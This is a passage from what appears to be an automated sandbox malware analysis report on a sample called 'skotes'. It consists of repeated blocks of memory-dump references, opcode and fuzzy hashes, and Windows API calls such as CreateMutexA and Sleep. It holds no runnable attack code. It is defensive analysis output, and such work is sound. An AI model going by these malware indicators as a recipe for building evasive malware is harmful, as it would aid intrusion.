                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesCreateFileMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 396266464-0
                                                                                                                                            • Opcode ID: 02a4110f1639c6e432535110bf3788693a3061f51eb4ed7c05476a83881bbc06
                                                                                                                                            • Instruction ID: db20e6612746f7534a26273daa8a35436abd9059daf755f1f0474daadf9fcf65
                                                                                                                                            • Opcode Fuzzy Hash: 02a4110f1639c6e432535110bf3788693a3061f51eb4ed7c05476a83881bbc06
                                                                                                                                            • Instruction Fuzzy Hash: 00312531711208DBEB08DBBCDD89FBDBB62AF96318F24835DE014A73D1C73689808652
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00ACA2E6
                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesCreateFileMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 396266464-0
                                                                                                                                            • Opcode ID: 810617d8926d5d14c8233fa0ef2eec7836a613c52513ed3ab844728e8fefd267
                                                                                                                                            • Instruction ID: fe1154d4b2465c265ec376e77007d30b3e5c65598e575aaf3ea810f7acf0cd75
                                                                                                                                            • Opcode Fuzzy Hash: 810617d8926d5d14c8233fa0ef2eec7836a613c52513ed3ab844728e8fefd267
                                                                                                                                            • Instruction Fuzzy Hash: A1313731710248DBEB18DB7CDD89B7DBA72AFA1318F20835CE415AB3D5C73689808752
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00ACA41B
                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesCreateFileMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 396266464-0
                                                                                                                                            • Opcode ID: 66d87da855edbb2d43827d241938564def97ae358b843294021e220b18450e10
                                                                                                                                            • Instruction ID: f3afb339ba18d41b8209b5869aac58caf590574acd796ff3186fda782a09054b
                                                                                                                                            • Opcode Fuzzy Hash: 66d87da855edbb2d43827d241938564def97ae358b843294021e220b18450e10
                                                                                                                                            • Instruction Fuzzy Hash: 26312531710208DBEB0C9BBCDA8DF7DB662EF91318F20825CE015A73D6C77689808652
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00ACA550
                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesCreateFileMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 396266464-0
                                                                                                                                            • Opcode ID: a80883e831e6947c980c88ae33c1f7e713f7854f9742a310e38322555e256e32
                                                                                                                                            • Instruction ID: 3ff65c86954fe440a10b10b6ce67cc857f1f22153a1aec8a50815746ece3faa3
                                                                                                                                            • Opcode Fuzzy Hash: a80883e831e6947c980c88ae33c1f7e713f7854f9742a310e38322555e256e32
                                                                                                                                            • Instruction Fuzzy Hash: B5312731B101088BEB08DB78D989F7DB762EF95318F24875CE015AB3D6CB3989818752
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00ACA685
                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
